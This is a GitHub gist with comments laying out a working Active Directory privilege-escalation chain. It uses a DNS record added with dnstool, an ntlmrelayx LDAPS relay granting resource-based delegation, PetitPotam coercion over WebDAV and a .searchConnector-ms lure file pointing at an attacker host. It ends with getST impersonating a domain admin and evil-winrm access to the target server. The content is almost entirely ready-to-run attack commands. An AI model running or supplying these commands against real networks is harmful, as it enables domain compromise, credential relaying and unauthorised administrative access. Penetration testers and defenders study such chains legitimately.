Last active
February 28, 2025 09:18
-
-
Save zimnyaa/dcac97f3106e96053a1acb6ca9974e55 to your computer and use it in GitHub Desktop.
PetitPotam WebDAV coerced authentication + LDAPS relaying
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # setting up a DNS record in the domain, the zone I required was found in ForestDNSZones | |
| python3 ./krbrelayx/dnstool.py -u DOMAIN\\zimnyaa -p <PASSWORD> -a add -r testrecord -d <MY_IP> --forest DC1.DOMAIN.local | |
| # setting up a LDAPS relay to grant RBCD to computer account we have | |
| # in my case MAQ = 0, so I escalated on a domain workstation and used it | |
| sudo impacket-ntlmrelayx -smb2support -t ldaps://DC1.DOMAIN.local --http-port 8080 --delegate-access --escalate-user MYWS\$ --no-dump --no-acl --no-da | |
| # PetitPotam to WebDAV with domain credentials (not patched) | |
| # DO NOT use FQDN here | |
| python3 PetitPotam.py -d DOMAIN.local -u zimnyaa -p <PASSWORD> testrecord@8080/a TARGETSERVER | |
| # if WebClient is not enabled, you will get the error 0x7. You can try to enable it by viewing a .searchConnector-ms file from the server (if it's a terminal server, for example) or hosting it on a public share and waiting | |
| # Documents.searchConnector-ms example: | |
| # <?xml version="1.0" encoding="UTF-8"?> | |
| # <searchConnectorDescription xmlns="http://schemas.microsoft.com/windows/2009/searchConnector"> | |
| # <iconReference>imageres.dll,-1002</iconReference> | |
| # <description>Microsoft Outlook</description> | |
| # <isSearchOnlyItem>false</isSearchOnlyItem> | |
| # <includeInStartMenuScope>true</includeInStartMenuScope> | |
| # <iconReference>\\YOUR_IP@8080\whatever.ico</iconReference> | |
| # <templateInfo> | |
| # <folderType>{91475FE5-586B-4EBA-8D75-D17434B8CDF6}</folderType> | |
| # </templateInfo> | |
| # <simpleLocation> | |
| # <url>\\YOUR_IP@8080\whatever.ico</url> | |
| # </simpleLocation> | |
| # </searchConnectorDescription> | |
| # ccache obtained with Rubeus /tgtdeleg and converted with ticketConverter | |
| export KRB5CCNAME=ws.ccache | |
| impacket-getST -k -spn wsman/TARGETSERVER.DOMAIN.local -dc-ip DC_IP -impersonate domain_admin DOMAIN.local/MYWS\$ | |
| # after setting up a KDC krb5.conf as per evil-winrm install instructions | |
| export KRB5CCNAME=domain_admin.ccache | |
| evil-winrm -r DOMAIN.local -i TARGETSERVER.DOMAIN.local --spn wsman | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
If you want to identify accessible locations where the parent folder is most likely to be opened by a real user, the best place to put a .searchConnector-ms file, as well as mass-deploying many search connectors to those locations and mass-clean them up, then I made a tool that automates those processes: https://github.com/gjhami/LinkSiren
Additionally, you can also start the WebClient service locally from a 'Manual (Trigger Start)' state, which is the default on Windows Workstations, using the
netcommand on Windows to map and unmap a drive with a WebDAV URL, like the following. This prevents you from having to make a Search Connector: